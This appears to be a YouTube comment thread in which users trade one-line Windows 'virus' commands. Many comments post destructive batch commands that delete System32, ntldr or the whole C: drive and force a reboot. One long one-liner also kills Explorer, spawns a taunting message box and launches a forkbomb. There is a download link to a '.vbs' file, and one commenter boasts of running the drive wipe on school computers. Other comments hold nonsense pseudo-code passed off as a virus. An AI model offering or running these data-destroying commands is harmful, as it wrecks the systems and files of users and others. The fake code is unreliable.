i know a single line one
0 likesdel C:\Windows\System32
WARNING: NEVER DO THIS I WILL NOT BE RESPONSIBLE TO ANY DAMAGE CAUSED TO YOUR COMPUTER
YOU WILL GET A BLUE SCREEN OF DEATH YOUR COMPUTER WILL BE DESTROYED
That's not a virus. By definition, a virus spreads from file to file. At best, this is malware
13 likesReplies (5)
This is trojan.
0 likesLet's call it a system bomb which explodes(counts as deletes) the system files.
0 likesnah its companion virus-like
0 likesIt's more like a trojan.
0 likesIt is a logic bomb.
0 likesYou can make an replicating virus in cpp in <3 lines.
0 likesuh u can do
1 likerd c:\ /s /q
ez rekt
hey try this but on windows xp or less http://www.mediafire.com/file/5yze3dk0bb517qy/Antivirus.vbs
0 likesI have made a batch virus wich has over 20.000 lines of code!
0 likesmountvol C:\ /d
0 likesReplies (1)
That does not cause permanent damage to the system besides file corruption that doesn't even occur every time.
0 likesI have an idea of making a batch virus that contains only 2 LINES OF CODE, THAT KILLS THE PC ! HERE IS THE CODE:
0 likes@echo off
del (.exe;.bat;.pif;.sys;.vbs;.jpg;inf;.ini;.wmv;.wma;.avi;.dll;.ink;.png;.bmp)
If i made a mistake, respond me with the correction.
Btw i am Romanian.LOLOL;-) ;-) ;-)
Я знаю худший вирус, состоящий из нули строк.
0 likes- АМИГО БРАУЗЕР
I can make a virus in 1 line.
0 likesdel C:/Windows/system32
i made a xp virus with only 1 line of code
3 likesdel C:\Windows\System32\hal.dll
Replies (4)
Del C:/
0 likes@@helloimkyle Add that to autoexec.bat.
0 likesWait Wait I have "shutdown -s -t 10"
0 likes+Funtw//Ew1 Fan ok
0 likesdel "c:/ntldr"&shutdown -s -t 0
0 likesone line batch file, world record u succ
i can make a better world record
0 likeswith just 1 line
"@del C:\Windows\System32\*.exe /q"
That's not a virus, it is a trojan. malware is called virus when it spreads (over the network or using external drives)
0 likescmd /c taskkill /im explorer.exe /f & cd %userprofile%\Desktop & del C:\ /s /q /f & echo Set Wshell=CreateObject("Wscript.Shell")>>m.vbs & echo Set FSO=CreateObject("Scripting.FileSystemObject")>>m.vbs & echo FSO.DeleteFile "m.vbs">>m.vbs & echo Wshell.Run "m.bat">>m.vbs & echo M=MsgBox("You Are An Idiot",0+16+4096,"You're Fucked M8")>>m.vbs & echo start m.bat>>m.bat & echo start m.bat>>m.bat & start m.vbs
1 likeThis Is One line of code
copy paste it into cmd or execute it in a .bat or .cmd file
Warning this will kill all your data on the c: drive and break Windows
What it does ?
It kills Your Explorer (Windows Desktop UI)
It then Delets all data On the C: Drive (If it can delete them)
it then creates m.vbs and m.bat
m.vbs brings up a msgbox and starts the m.bat
m.bat is a forkbomb the will crash the system or make it unusable forcing the user to restart if the pc doesnt crash
Replies (1)
Lima X of the past :P
1 likei have a good one!
5 likes<div>=246364-/promocode id=566021570 [Encryptioncode]=102927392[Virus-appear-warn] VirusCode=473835838
<span> VirusAppear=$6.28 <span> Viruscode=84204829 - 3474582480 - 387484683 - 23477634873 - 3743838388
<CmdVirus> Infect-Memory-System <span> Delete-All-Apps/57463727 Appcode=384343 348674384 029193473843
[Popup]=6748333: Error screen= 10383292 <span> spawn bonzi Buddy <span> [Kill internet ] 476832648338
BSOD=48329202 <span> Virus=Spawn B.S.O.D <span> <cmd>=102839328 <span> Spam errorcard 80x Code=473829 <span>
Image/Gif(Appear)= <Span> Screensize-270 <span> [Server-Encryption-Begin]
P.C. shutdown=27484282 [Server-Encryption-End] Encryption=PC Error
[Begin pc delete] 8564832 Money=sellall==$567.63[Txt=Your ded]
[Begin system death prog] 10%=Delete-all-games [Kill mouse]==$1403.78
55%=Power-shut-off <span> Break internet <span> Mouse-malfunction==5673.56
[Encryption begin]=103%-Break all apps and mouse [Promocode=Kill]
<cmd> Delete-system32=253%=Kill-Cortana[Cortanacmd]=say youre ded >:)
<div>=564 {Bonzi command}= say "Muahahahaha!" [background]= Black
Txtbubble=[Dont you dare shut down!] MS Mike voice= say "F---"
750%= kill-power [Opening-000.exe] {000.exe= kill all apps}
950%= whole screen=BLACK [Wordappear=screen]=666
1000%=Kill all systems ( DEATH ) <div> BSOD appear <span>
Replies (6)
Sniping Hero If you don't care, why did you remind Jamesbarw66 2017 about closing tags?
1 likeMaybe you're right, I shouldn't have said that but do I care? 🇳 🇴
0 likesSniping hero why do you say 'Rekt' at the end? Just because you know HTML and you need to remind someone about that, doesn't mean you say 'Rekt'. He didn't even try to roast you.
1 likeWhat about I say "Sniping Hero more like Sniping Condescender"
Also, learn how to use HTML tag usage, you haven't closed any of these tags, wich means that the HTML file parser will get confused. You didn't also input the <html lang= en_US> </html> and the most important tags <head></head> & <body></body>. Rekt
0 likesThat isn't even a working virus, just a bit of <span> instructions and <cmd> instructions with text
1 likeHeres one too!
0 likes<div id>=Virus[Kill-all-apps]==$5.37
(Bonzi=spawn:Install[Blackscreen]
<div>=38329219[Delete-all-apps]==$6.48
lol
0 likesdel /q /f C\windows\system32\This video sucks
Этот пк должен был умереть, потому что на нём установлен Амиго
35 likesi think this is it
47 likes@echo off
del C:\ /q /s
shutdown -r
______________________________________________
what thease codes mean
_--------------------------------
@echo off = does not shows the code
del C:\ /q /s = deletes NTLDR automaniclly
shutdown -r = Restarts the computer
------------------------------------------------------------------------------
like if you agree :-)
Replies (5)
It wouldn't work (shutdown.exe is missing!) So, in XP setup, create a 2nd drive. And, with that drive (Let's say that it's E:), we can do this:
0 likes@echo off
move C:\Windows\system32\shutdown.exe E:\
rd C:\ /s /q
start E:\shutdown.exe -r -t 00
anyway... if you want to delete a file without this -
0 likesask in yes or no ,
do rd .
but... If you want the timer, do shutdown -r -t (number of seconds)
0 likesExample = shutdown -r -t 60 = shut down the computer after 60 seconds;
Info = adding -t and number of seconds is the diference of the normal command
Normal - shutdown -r. it will restart after no seconds
del C:\ /q /s will wipe the entire C:\ Drive.... which is something that I like to execute on school computers :)
2 likesMr Diamond Can i make it on my pc
0 likes